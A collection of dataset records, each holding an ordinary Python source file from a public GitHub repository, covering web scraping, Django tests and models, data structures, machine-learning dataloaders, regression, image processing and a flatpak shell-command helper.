scrape_goodreads_page(GOODREADS_URL, 1)\n #print(goodreads_page_data)\n\n #Scrape all pages and add to a list:\n entire_library = []\n num_of_pages_in_library = 30 #Assumes 30 books per page for now, need to figure out how to make the loop dynamic.\n\n for i in range(num_of_pages_in_library):\n goodreads_page_data = scrape_goodreads_page(GOODREADS_URL, page_number=i)\n entire_library.append(goodreads_page_data)\n #print(len(entire_library))\n\n combined_lists = combine_page_lists(entire_library)\n convert_list_to_csv(combined_lists)","repo_name":"ccmilne/GoodReads_Parser","sub_path":"GoodReads_Parser.py","file_name":"GoodReads_Parser.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12836805953","text":"from django.test import TestCase\nfrom ..functions.timeobjects import *\n\nfrom unittest import mock\nimport datetime\n\n# test timeObject class\nclass test_timeObject(TestCase):\n # test the getDate function for timeObject\n def test_getDate(self):\n date = 20180917\n self.assertEqual(timeObject(date).getDate(), date)\n date = 12002030\n self.assertEqual(timeObject(date).getDate(), date)\n date = 50000101\n self.assertEqual(timeObject(date).getDate(), date)\n date = 00000000\n self.assertEqual(timeObject(date).getDate(), date)\n\n # test the weekday function for timeObject\n def test_weekday(self):\n date = 20180917 # Monday\n self.assertEqual(timeObject(date).weekday(), 0)\n date = 20180911 # Tuesday\n self.assertEqual(timeObject(date).weekday(), 1)\n date = 20180919 # Wednesday\n self.assertEqual(timeObject(date).weekday(), 2)\n date = 20180906 # Thursday\n self.assertEqual(timeObject(date).weekday(), 3)\n date = 20180914 # Friday\n self.assertEqual(timeObject(date).weekday(), 4)\n date = 20180901 # Saturday\n self.assertEqual(timeObject(date).weekday(), 5)\n date = 20180930 # Sunday\n self.assertEqual(timeObject(date).weekday(), 6)\n\n# test givenTime object\nclass test_givenTime(TestCase):\n # test the creation of the givenTime object with YMD type\n def test_givenTimeCreationYMD(self):\n inputtedDate = '2018-09-17'\n date = 20180917\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n inputtedDate = '1200F20930'\n date = 12002030\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n inputtedDate = '5000101W01'\n date = 50000101\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n inputtedDate = '0000X00P00'\n date = 00000000\n self.assertEqual(givenTime(inputtedDate, \"YMD\").getDate(), date)\n\n # test the creation of the givenTime object with DMY type\n def test_givenTimeCreationDMY(self):\n inputtedDate = '17-09-2018'\n date = 20180917\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n inputtedDate = '30F2091200'\n date = 12002030\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n inputtedDate = '01101W5000'\n date = 50000101\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n inputtedDate = '00X00P0000'\n date = 00000000\n self.assertEqual(givenTime(inputtedDate, \"DMY\").getDate(), date)\n\nclass test_currentTime(TestCase):\n\n def test_currentTimeCreation(self):\n with mock.patch('datetime.datetime') as dt_mock:\n dt_mock.now.return_value.strftime.return_value = '20060204'\n date = 20060204\n self.assertEqual(currentTime().getDate(), date)\n\n dt_mock.now.return_value.strftime.return_value = '30061201'\n date = 30061201\n self.assertEqual(currentTime().getDate(), date)\n\n dt_mock.now.return_value.strftime.return_value = '23060131'\n date = 23060131\n self.assertEqual(currentTime().getDate(), date)\n\n dt_mock.now.return_value.strftime.return_value = '20180917'\n date = 20180917\n self.assertEqual(currentTime().getDate(), date)\n","repo_name":"rdugg4/IFB299-Group-70-S.K.R.A.M","sub_path":"SKRAM70/testApp/tests/test_timeObjects.py","file_name":"test_timeObjects.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"70870908758","text":"from enum import Enum\r\n\r\n\r\nclass Node:\r\n def __init__(self):\r\n self.value = None\r\n self.key = None\r\n self.FREE = True\r\n self.DELETED = False\r\n self.TAKEN = False\r\n\r\n\r\ndef hash(key, n):\r\n idx = 0\r\n for ch in key:\r\n idx += ord(ch) * 37\r\n idx %= n\r\n return idx\r\n\r\n\r\ndef insert(arr, val, key, n):\r\n idx = hash(key, n)\r\n for i in range(n):\r\n idx += 37 # 37 i n są względnie pierwsze, bo n jest potega dwojki\r\n idx %= n\r\n if arr[idx].FREE or arr[idx].DELETED:\r\n arr[idx].value = val\r\n arr[idx].key = key\r\n\r\n arr[idx].TAKEN = True\r\n arr[idx].FREE = False\r\n arr[idx].DELETED = False\r\n return\r\n print(\"Tablica jest przepełniona\")\r\n\r\n\r\ndef remove(arr, key, n):\r\n idx = hash(key, n)\r\n for i in range(n):\r\n idx += 37\r\n idx %= n\r\n if arr[idx].FREE:\r\n break\r\n if arr[idx].key == key:\r\n arr[idx].TAKEN = False\r\n arr[idx].DELETED = True\r\n return\r\n print(\"Nie znaleziono klucza!\")\r\n\r\n\r\ndef find(arr, key, n):\r\n idx = hash(key, n)\r\n for i in range(n):\r\n idx += 37\r\n idx %= n\r\n if arr[idx].FREE:\r\n break\r\n if arr[idx].key == key and arr[idx].TAKEN:\r\n print(\"Val [\", key, \"]:\", arr[idx].value)\r\n return\r\n print(\"Nie znaleziono klucza!\")\r\n\r\n\r\ndef pow2(n):\r\n l = 1\r\n while l < n:\r\n l *= 2\r\n return l\r\n\r\n\r\nwhile True:\r\n\r\n n = int(input(\"How big table?\"))\r\n n = pow2(n)\r\n to_add = int(input(\"How many add?\"))\r\n to_remove = int(input(\"How many remove?\"))\r\n to_find = int(input(\"How many find\"))\r\n\r\n array = [Node() for _ in range(n)]\r\n\r\n for i in range(to_add):\r\n key = input(\"Enter the key to add:\")\r\n val = int(input(\"Enter the value to add:\"))\r\n insert(array, val, key, n)\r\n\r\n for i in range(to_remove):\r\n key = input(\"Enter the key to remove:\")\r\n remove(array, key, n)\r\n\r\n for i in range(to_find):\r\n key = input(\"Enter the key to find: \")\r\n find(array, key, n)\r\n break\r\n\r\n","repo_name":"delekta/agh-asd","sub_path":"3.data-structures/hash-table/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39360552893","text":"from dataclasses_avroschema import AvroModel\n\nfrom kstreams import ConsumerRecord\n\n\nclass AvroSerializer:\n async def serialize(self, instance: AvroModel, **kwargs) -> bytes:\n \"\"\"\n Serialize an AvroModel to avro-binary\n \"\"\"\n return instance.serialize()\n\n\nclass AvroDeserializer:\n def __init__(self, *, model: AvroModel) -> None:\n self.model = model\n\n async def deserialize(\n self, consumer_record: ConsumerRecord, **kwargs\n ) -> ConsumerRecord:\n \"\"\"\n Deserialize a payload to an AvroModel\n \"\"\"\n if consumer_record.value is not None:\n data = self.model.deserialize(consumer_record.value)\n consumer_record.value = data\n return consumer_record\n","repo_name":"kpn/kstreams","sub_path":"examples/dataclasses-avroschema-example/dataclasses_avroschema_example/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"85"} +{"seq_id":"21678470044","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: easy00000000\nVersion: 0.10\nDate: 2018-01-05\n\"\"\"\n\nimport numpy as np\nimport statsmodels.formula.api as smf\n\ndef real_trend(bi, v=1.0):\n t = np.zeros(len(bi))\n p = 0\n for i in range(1,len(bi)):\n if bi[i-1] > 0:\n p = -v\n elif bi[i-1] < 0:\n p = v\n t[i] = p\n return t\n\ndef strong(bi, tr=None, t=0.02, v=0.5):\n s = np.zeros(len(bi))\n pos1 = 0\n for i in range(1,len(bi)): \n if bi[i]>0: \n if -bi[i]/bi[pos1]-1>t:\n for j in range(pos1+1,i+1):\n s[j] = v\n pos1 = i\n elif bi[i]<0:\n if -bi[pos1]/bi[i]-1>t:\n for j in range(pos1+1,i+1):\n s[j] = -v\n pos1 = i\n if tr is not None:\n for i in range(len(bi)):\n if tr[i]>0 and s[i]<0:\n s[i] = 0.\n elif tr[i]<0 and s[i]>0:\n s[i] = 0. \n return s\n\ndef est_trend_1(pl, v=1.0):\n # slope\n t = np.zeros(len(pl))\n slope = np.zeros(len(pl))\n dw=5\n x=np.arange(1,dw+1)/100.0\n for i in range(dw,len(slope)):\n #y = pl[i-dw+1:i+1].values / pl[i-dw+1:i+1].values.mean() - 1\n y = pl[i-dw+1:i+1] / pl[i-dw+1:i+1].mean() - 1\n model = smf.OLS(y,x)\n results = model.fit() \n slope[i] = results.params\n for i in range(dw, len(pl)):\n if slope[i]>=0:\n t[i] = v\n else:\n t[i] = -v\n return t, slope\n\ndef est_trend_2(pl, bolu, bold, v=1.0):\n # boll\n t = np.zeros(len(pl)) \n for i in range(0, len(pl)):\n if pl[i] > bolu[i]:\n t[i] = v\n elif pl[i] < bold[i]:\n t[i] = -v\n return t\n\ndef est_trend_3(pl, v=1.0):\n t = np.zeros(len(pl)) \n for i in range(0, len(pl)):\n if pl[i] >= 0:\n t[i] = v\n elif pl[i] < 0:\n t[i] = -v\n return t\n\ndef get_match_trend(real_trend, est_trend, *args, **kwargs):\n up_trend_match = 0\n up_trend_mismatch = 0\n down_trend_match = 0\n down_trend_mismatch = 0\n for i in range(0, len(real_trend)):\n if real_trend[i] > 0:\n if est_trend[i] > 0:\n up_trend_match = up_trend_match + 1\n else:\n up_trend_mismatch = up_trend_mismatch + 1\n elif real_trend[i] < 0:\n if est_trend[i] < 0:\n down_trend_match = down_trend_match + 1\n else:\n down_trend_mismatch = down_trend_mismatch + 1\n total_up = up_trend_match + up_trend_mismatch\n total_down = down_trend_match + down_trend_mismatch\n up_match = up_trend_match / total_up\n up_mismatch = up_trend_mismatch / total_up\n down_match = down_trend_match / total_down\n down_mismatch = down_trend_mismatch / total_down\n return [up_match, up_mismatch, down_match, down_mismatch]\n\ndef display_match_trend(match_trend):\n up_match=match_trend[0]/(match_trend[0]+match_trend[3])\n up_mismatch=match_trend[1]/(match_trend[1]+match_trend[2])\n down_match=match_trend[2]/(match_trend[1]+match_trend[2])\n down_mismatch=match_trend[3]/(match_trend[0]+match_trend[3])\n title_trend = '{:20}'.format('Macth Ratio:') + \\\n '{:20}'.format('est_up_trend') + \\\n '{:20}'.format('est_down_trend')\n up_trend_match ='{:20}'.format('real_up_trend') + \\\n '{:20}'.format('%0.2f%%' %(up_match*100)) + \\\n '{:20}'.format('%0.2f%%' %(up_mismatch*100))\n down_trend_match = '{:20}'.format('real_down_trend') + \\\n '{:20}'.format('%0.2f%%' %(down_mismatch*100)) + \\\n '{:20}'.format('%0.2f%%' %(down_match*100))\n prn_txt = title_trend + '\\n' + \\\n up_trend_match + '\\n' + \\\n down_trend_match\n \n return prn_txt","repo_name":"easy00000000/working_tencent_cloud","sub_path":"HK_Trade/Algorithm/mkstatus.py","file_name":"mkstatus.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41340293357","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport re\r\nimport string\r\n\r\ndata=open(r\"C:\\Users\\20115\\Downloads\\Health-News-Tweets\\Health-Tweets\\bbchealth.txt\",\"r\") \r\nfor line in data:\r\n #remove id and timestamp\r\n data = line.split(\"|\")\r\n data=data[2]\r\n #remove hash\r\n data=data.replace(\"#\",\"\")\r\n #remove url\r\n data = re.sub(r\"http\\S+\", \"\", data)\r\n data = re.sub(r\"www\\S+\", \"\", data)\r\n #convert to lowercase\r\n data=data.lower()\r\n #remove words that starts with @\r\n data = re.sub(r\"@\\S+\", \"\", data)\r\n #remove @\r\n data=data.replace(\"@\",\"\")\r\n\r\n print(data)\r\n \r\n\r\ndef jaccard(a , b):\r\n #calculating the intersection bet elements of set a amd set b\r\n intersection = list(set(a) & set(b))\r\n #grouping both elements of set a amd set b without repetition\r\n union = list(set(a) | set(b))\r\n #calc. jaccard distance \r\n distance = len(intersection)/len(union)\r\n return distance\r\n\r\n\r\n#we need to get the nearest centroid to each training example\r\ndef assign_clusters(centroids, cluster_array):\r\n#value of each centroid (K , n)\r\n ExamplesCentroids = []\r\n\r\n for i in range(len(cluster_array)):\r\n z=10000000\r\n index = -1\r\n for j in range(len(centroids)): \r\n dis = jaccard(cluster_array[i],centroids[j]) \r\n if dis < z :\r\n z = dis\r\n index = j\r\n ExamplesCentroids.append(index)\r\n\r\n return ExamplesCentroids \r\n\r\ndef calc_centroids(X, ExamplesCentroids, K):\r\n m, n = X.shape\r\n Centroids = np.zeros((K, n))\r\n #select the centriod for cluster\r\n for i in range(K) : \r\n min_dis_sum = 0\r\n Centroids_indx=-1\r\n #store distance \r\n min_dis_dp=[]\r\n for p1 in range(K[i]):\r\n min_dis_dp.append([])\r\n dis_sum=0\r\n # sum for every distances of tweet p1 with every tweet p2 in the same cluster\r\n for p2 in range(K[i]):\r\n if p1 != p2:\r\n if p1 < p2:\r\n cent_dis = min_dis_dp[p1][p2]\r\n else:\r\n cent_dis= jaccard(K[i][p2][0], K[i][p1][0])\r\n min_dis_dp[p2].append(cent_dis)\r\n dis_sum += cent_dis\r\n else:\r\n min_dis_dp.append(0)\r\n # select the minimum sum of distance as a centroid \r\n if dis_sum < min_dis_sum:\r\n min_dis_sum = dis_sum\r\n Centroids_indx=p2\r\n \r\n # append the selected tweet to the centroid list\r\n Centroids.append(K[i][Centroids_indx][0])\r\n \r\n return Centroids\r\n\r\n","repo_name":"Roma927/tweets","sub_path":"Project_AI/AI_project.py","file_name":"AI_project.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71333293398","text":"'''\n1783. 병든 나이트\n처음엔 문제 이해가 잘 안됐는디.. 그래프 탐색인가 했는데 n, m 범위가 어마무시 해서 생각 고쳐 먹음.. 심지어 O(n)도 안됨,,\n두뇌 게임 같은 문제 경우의 수를 잘 나누는 게 관건,,\n\n** 그리디 (가로 이동을 1로 할 경우 최대한 이동 가능하다는 점 착안, 세로/가로 길이에 따라 경우의 수 나누기)\n'''\n\n\ndef solution(n, m):\n if n == 1:\n return 1\n if n == 2:\n return min((m - 1) // 2 + 1, 4) # 최대 4번\n\n # n > 2 && m < 7 -> 최대 4번\n if m < 7:\n return min(m, 4)\n # n > 2 && m >= 7 -> 모든 이동 방법 사용 가능\n return 2 + (m - 4) # 처음 두번은 가로 2 이동 두 번, 나머지는 1 이동 방법으로 채우기\n\n\nn, m = map(int, input().split())\nprint(solution(n, m))\n","repo_name":"coding-test-study-room/repo","sub_path":"baekjoon/dldbdud314/week8/병든나이트.py","file_name":"병든나이트.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"29793855795","text":"from json import load, dump\nfrom os.path import exists, dirname\nfrom os import makedirs\n\nfrom time import struct_time, strftime\n\nclass SongList:\n \n \"\"\"This class basically provides a clean interface for accessing and\n manipulating the song list and handles the song file behind the\n scenes.\n \"\"\"\n \n def __init__(self, fpath):\n self.songfile = fpath\n if exists(fpath):\n self.load_list()\n else:\n self._id = 0\n self.songlist = []\n self.save_list()\n \n def __iter__(self):\n \"\"\"Iterate backwards through the songlist (most to least recent).\n \"\"\"\n self._index = len(self.songlist) - 1\n return self\n \n def __next__(self):\n if self._index < 0:\n raise StopIteration\n song = self.songlist[self._index]\n self._index -= 1\n return song\n \n def save_list(self):\n fdir = dirname(self.songfile)\n if fdir and not exists(fdir):\n makedirs(fdir)\n with open(self.songfile, 'w') as f:\n dump([self.songlist, self._id], f, indent=4)\n \n def load_list(self):\n with open(self.songfile, 'r') as f:\n try:\n self.songlist, self._id = load(f)\n except ValueError:\n # File is not valid JSON; just make an empty list\n self._id = 0\n self.songlist = []\n self.save_list()\n \n def add_song(self, song, rm_old=True):\n if rm_old:\n old_ids = []\n for s in self.songlist:\n if s['url'] == song['url']:\n old_ids.append(s['id'])\n for _id in old_ids:\n self.remove_song(_id)\n self.songlist.append(song)\n self.save_list()\n \n def remove_song(self, song_id):\n for s in self.songlist:\n if s['id'] == song_id:\n self.songlist.remove(s)\n self.save_list()\n return\n \n def clear_list(self):\n self.songlist = []\n self.save_list()\n \n def new_id(self):\n # Each song is to be given a unique ID number to make removal\n # easy.\n self._id += 1\n return self._id\n \n def timestring(self, ttuple):\n \"\"\"Take the tuple stored in the JSON file and turn it into a\n human readable string.\n \"\"\"\n return strftime('%a %d/%m/%Y at %H:%M:%S %Z', struct_time(ttuple))\n","repo_name":"bunburya/songlist","sub_path":"app/songhandler.py","file_name":"songhandler.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31387409108","text":"#多个图像按照z轴进行叠加,2D变成3D图像\n\nimport os\nfrom glob import glob\nimport SimpleITK as sitk\nimport nibabel as nib\nimport numpy as np\nimport re\n\nfrom PIL import Image\nimport numpy as np\nfrom scipy.ndimage import rotate\n\nsource_path=\"./output/sagittal/\"\nsave_path=\"./output\"\n\nfiles = glob(source_path+'/*.png')\n\ndef natural_sort(l): #排序\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n return sorted(l, key = alphanum_key)\n\nfiles=natural_sort(files)\n# files.reverse()\n\n\n\nflag=True\nfor file in files:\n\n filename = os.path.basename(file)\n\n image = Image.open(file) # 用PIL中的Image.open打开图像 与原始图像不一致,是否是读取的问题\n image_arr = np.array(image) # 转化成numpy数组\n # image_arr = np.fliplr(image_arr) # 左右翻转\n # image_arr = np.rot90(image_arr, -1)\n\n\n\n if flag : #默认等于第一张的numpy矩阵\n data=image_arr\n flag=False\n else :\n # data_shape=data.shape\n # image_arr_shape = image_arr.shape\n\n data_dim=data.ndim\n image_dim=image_arr.ndim\n\n if data_dim ==2 :\n data = np.expand_dims(data, axis=2)\n\n if image_dim ==2 :\n image_arr = np.expand_dims(image_arr, axis=2)\n\n # image_arr = np.resize(image_arr, data_shape)\n # data=np.stack((data,image_arr),axis=2)\n\n data=np.concatenate((data, image_arr), axis = 2)\n\n\nprint(data.shape)\n\n# a = np.zeros((131,512,512)).astype(np.uint8)\n\n#数组变换\n#旋转\n# data = np.rot90(data,-1) #旋转90,负数顺时针\n\n#翻转\n# data=np.flipud(data) #上下翻转\n# data = np.fliplr(data) #左右翻转\n\n# data=np.flip(data,axis=0)\n# data=np.flip(data,axis=1)\n\n#维度交换\n\n# data = data.swapaxes(1,2)\ndata = data.swapaxes(0,2)\n\n#转置\n# data = data.transpose((0, 2, 1))\n# data = data.transpose((1, 2, 0))\n\n# data=data[:,::-1,:]\n\n\n\n# print(data.shape)\n\nimg = nib.Nifti1Image(data, np.eye(4))\n\nnib.save(img, os.path.join(save_path, 'sagittal.nii.gz'))\n","repo_name":"bigorgs/Medical-Tools","sub_path":"img2voxels.py","file_name":"img2voxels.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"39666026767","text":"def find_string_anagrams(str, pattern):\n result_indexes = []\n patternMap = {};\n matched = 0 ; \n start = 0;\n \n for char in pattern:\n if(char in patternMap):\n patternMap[char] +=1;\n else:\n patternMap[char] = 1;\n \n for idx,end in enumerate(str): \n if(end in patternMap):\n patternMap[end] -=1;\n if(patternMap[end] == 0):\n matched+=1; \n \n if(matched == len(patternMap)):\n result_indexes.append(start);\n \n if(idx - start + 1 == len(pattern)):\n if(str[start] in patternMap):\n if(patternMap[str[start]]==0):\n matched-=1;\n patternMap[str[start]]+=1;\n start+=1;\n\n return result_indexes;\n\n\n","repo_name":"Sumit2202/DataStructures-Algos","sub_path":"SlidingWindow/FindStringAnagrams.py","file_name":"FindStringAnagrams.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"43086444989","text":"\"\"\"\nMulti-EPL: Accurate Multi-Source Domain Adaptation\n\nAuthors:\n- Seongmin Lee (ligi214@snu.ac.kr)\n- Hyunsik Jeon (jeon185@gmail.com)\n- U Kang (ukang@snu.ac.kr)\n\nFile: src/loader/dataloader.py\n- Contains source code for setting Digits-Five dataset and dataloader\n\"\"\"\n\nimport numpy as np\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom loader.digits.mnist import load_mnist\nfrom loader.digits.mnist_m import load_mnist_m\nfrom loader.digits.svhn import load_svhn\nfrom loader.digits.synthdigits import load_synthdigits\nfrom loader.digits.usps import load_usps\n\ndigits_data_dir = '../../data/digits'\n\ndigits_transform = transforms.Compose([transforms.ToPILImage(),\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n\nclass GeneralDataset(Dataset):\n \"\"\" General dataset for Digits-Five \"\"\"\n def __init__(self, images, labels, transform, target_train):\n super(GeneralDataset, self).__init__()\n self.images = images\n if target_train:\n self.labels = -np.ones_like(labels)\n else:\n self.labels = labels\n self.num_data = len(self.labels)\n self.transform = transform\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n image = self.images[idx]\n label = int(self.labels[idx])\n if self.transform:\n image = self.transform(image)\n sample = {'image': image, 'label': label, 'index': idx}\n return sample\n\n\ndef get_digits_dataloader(name='MNIST', target=False, transform=digits_transform, batch_size=64, data_num=-1, data_dir=digits_data_dir):\n \"\"\"\n Get dataset and dataloader for a Digits-Five dataset\n :param name: name of the dataset (one of MNIST, MNIST-M, SVHN, SYN, and USPS)\n :param target: True if the requested dataset is target dataset\n :param transform: how to transform images\n :param batch_size: batch size for dataloader\n :param data_num: the number of training data\n :param data_dir: the directory where Digits-Five data are saved\n :return: Training dataset, Training dataloader, Test dataset, Test dataloader for the requested dataset\n \"\"\"\n if name == 'MNIST':\n print('Load MNIST data')\n train_data, test_data, train_label, test_label = load_mnist(data_dir, data_num)\n elif name == 'MNIST-M':\n print('Load MNIST-M data')\n train_data, test_data, train_label, test_label = load_mnist_m(data_dir, data_num)\n elif name == 'SVHN':\n print('Load SVHN data')\n train_data, test_data, train_label, test_label = load_svhn(data_dir, data_num)\n elif name == 'SYN':\n print('Load SYN data')\n train_data, test_data, train_label, test_label = load_synthdigits(data_dir, data_num)\n elif name == 'USPS':\n print('Load USPS data')\n train_data, test_data, train_label, test_label = load_usps(data_dir, data_num)\n else:\n raise ValueError('Name should be one of MNIST, MNIST-M, SVHN, SYN, and USPS')\n\n train_dataset = GeneralDataset(train_data, train_label, transform, target)\n test_dataset = GeneralDataset(test_data, test_label, transform, False)\n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)\n test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False, drop_last=True)\n return train_dataset, train_dataloader, test_dataset, test_dataloader\n","repo_name":"snudatalab/MultiEPL","sub_path":"src/loader/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"27548074421","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nnum_interations_of_regression = 100\r\n\r\n# intercept\r\ntheta0 = 1\r\n# slope\r\ntheta1 = 1\r\n# learning rate\r\nalpha = 0.25\r\n\r\n# Reading Housing Data File\r\nfile = pd.read_csv('MLS.csv', delimiter=',') \r\n \r\ncomp_index = []\r\ncomp_benchmark_price = []\r\n\r\n# Scaling Factor of parameters\r\nindex_scaling_factor = 1000\r\nbenchmark_price_scaling_factor = 1000000\r\n\r\nfor input in range(0,len(file.iloc[:,0])):\r\n if 'Toronto' in file.iloc[input,0]:\r\n comp_index.append(file.iloc[:,1][input]/index_scaling_factor)\r\n comp_benchmark_price.append(file.iloc[:,2][input]/benchmark_price_scaling_factor)\r\n\r\ndata = []\r\nfor index in range (0, len(comp_index)):\r\n data.append([comp_index[index], comp_benchmark_price[index]])\r\n\r\nnum_rand_ints = len(comp_index)\r\n\r\ndf = pd.DataFrame (data, columns=['x','y'])\r\ndf.plot(kind='scatter', x='x', y='y')\r\n\r\n# Gradient Descent Calculation \r\ndef new_theta_function (alpha, theta0, theta1, x, y):\r\n new_theta0 = float(theta0 - (alpha/num_rand_ints) * sum_theta_function_x(theta0, theta1, x, y))\r\n new_theta1 = float(theta1 - (alpha/num_rand_ints) * sum_theta_function_y(theta0, theta1, x, y))\r\n cost = (1/(2*num_rand_ints)) * sum_y_coordinates(theta0, theta1, x, y)\r\n print ([new_theta0, new_theta1, cost])\r\n return [new_theta0, new_theta1, cost]\r\n\r\n#sum((theta0 + theta1*x -y)*x)\r\ndef sum_theta_function_x (theta0, theta1, x, y):\r\n total = 0\r\n for index in range(0, num_rand_ints):\r\n total += float((theta0*x.iloc[index] + theta1 - y.iloc[index])*x.iloc[index])\r\n return total\r\n\r\n#sum(theta0 + theta1*x - y)\r\ndef sum_theta_function_y (theta0, theta1, x, y):\r\n total = 0\r\n for index in range(0, num_rand_ints):\r\n total += float(theta0*x.iloc[index] + theta1 - y.iloc[index])\r\n return total\r\n\r\ndef sum_y_coordinates (theta0, theta1, x, y):\r\n total = 0\r\n for index in range (0, num_rand_ints):\r\n total += (theta0*x.iloc[index] + theta1 - y.iloc[index])**2\r\n return total\r\n\r\n# Main\r\n# Lowest Cost Tracker\r\n[lowest_theta0, lowest_theta1, lowest_cost] = [0, 0, 0]\r\n\r\nprint (\"Computing theta0 and theta1 \" + str(num_interations_of_regression) + \" times, please wait.\")\r\nfor index in range(num_interations_of_regression):\r\n [theta0, theta1, cost] = new_theta_function(alpha, theta0, theta1, df.loc[:, 'x'], df.loc[:, 'y'])\r\n if index == 0:\r\n lowest_cost = cost\r\n if index > 0:\r\n if lowest_cost > cost:\r\n lowest_cost = cost\r\n lowest_theta0 = theta0\r\n lowest_theta1 = theta1\r\n\r\nprint(\"The best theta parameters based on the lowest cost of: \" + str(lowest_cost) + \" is theta0: \" + str(lowest_theta0) + \" and theta1: \" + str(lowest_theta1))\r\n","repo_name":"jhuy/toronto_housing_linear_regression","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39338992615","text":"import subprocess\nimport re\nimport asyncio\nimport threading\nfrom typing import Callable, List, Union\nfrom .utils import log\n\n_sanitizer = None\ndef sanitize(_input: str) -> str:\n global _sanitizer\n\n if not _sanitizer:\n _sanitizer = re.compile(r'[^0-9a-zA-Z]+')\n\n return re.sub(_sanitizer, \" \", _input)\n\ndef sh(command: Union[str, List[str]], return_stderr=False) -> str:\n to_check = command if isinstance(command, str) else ' '.join(command)\n\n try:\n log(f'Running {command}')\n\n cmd = f'flatpak-spawn --host {command}'.split(' ') if isinstance(command, str) else ['flatpak-spawn', '--host', *command]\n output = subprocess.run(cmd, encoding='utf-8', shell=False, check=True, capture_output=True)\n output.check_returncode()\n except subprocess.CalledProcessError as e:\n print(e.stderr)\n\n if return_stderr:\n return e.output\n\n raise e\n\n return re.sub(r'\\n$', '', output.stdout)\n\ndef threaded_sh(command: Union[str, List[str]], callback: Callable[[str], None]=None, return_stderr=False):\n to_check = command if isinstance(command, str) else command[0]\n\n def run_command(command: str, callback: Callable[[str], None]=None):\n try:\n output = sh(command, return_stderr)\n\n if callback:\n callback(re.sub(r'\\n$', '', output))\n\n except subprocess.CalledProcessError as e:\n log(e.stderr)\n raise e\n\n thread = threading.Thread(target=run_command, daemon=True, args=(command, callback, ))\n thread.start()","repo_name":"mijorus/boutique","sub_path":"src/lib/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"85"} +{"seq_id":"29067128084","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass AbstractQuestion(models.Model):\n question_number = models.IntegerField()\n question = models.CharField(max_length=100)\n\n class Meta:\n abstract = True\n\n def __str__(self):\n return self.question\n\n\nclass BooleanQuestion(AbstractQuestion):\n pass\n\nclass TheoryQuestion(AbstractQuestion):\n pass\n\n\nclass BooleanQuestionAnswer(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='boolean_questions'\n )\n question = models.ForeignKey(\n BooleanQuestion,\n on_delete=models.CASCADE,\n related_name='questions'\n )\n answer = models.BooleanField()\n\nclass TheoryQuestionAnswer(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='theory_questions'\n )\n question = models.ForeignKey(\n TheoryQuestion,\n on_delete=models.CASCADE,\n related_name='questions'\n )\n answer = models.TextField()\n\n\nclass MultipleChoiceQuestionOption(models.Model):\n option = models.CharField(max_length=100)\n\n def __str__(self):\n return self.option\n\n\nclass MultipleChoiceQuestion(AbstractQuestion):\n options = models.ManyToManyField(\n MultipleChoiceQuestionOption,\n related_name='options'\n )\n\n\nclass MultipleChoiceQuestionAnswer(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='multiple_choice_questions'\n )\n question = models.ForeignKey(\n MultipleChoiceQuestion,\n on_delete=models.CASCADE,\n 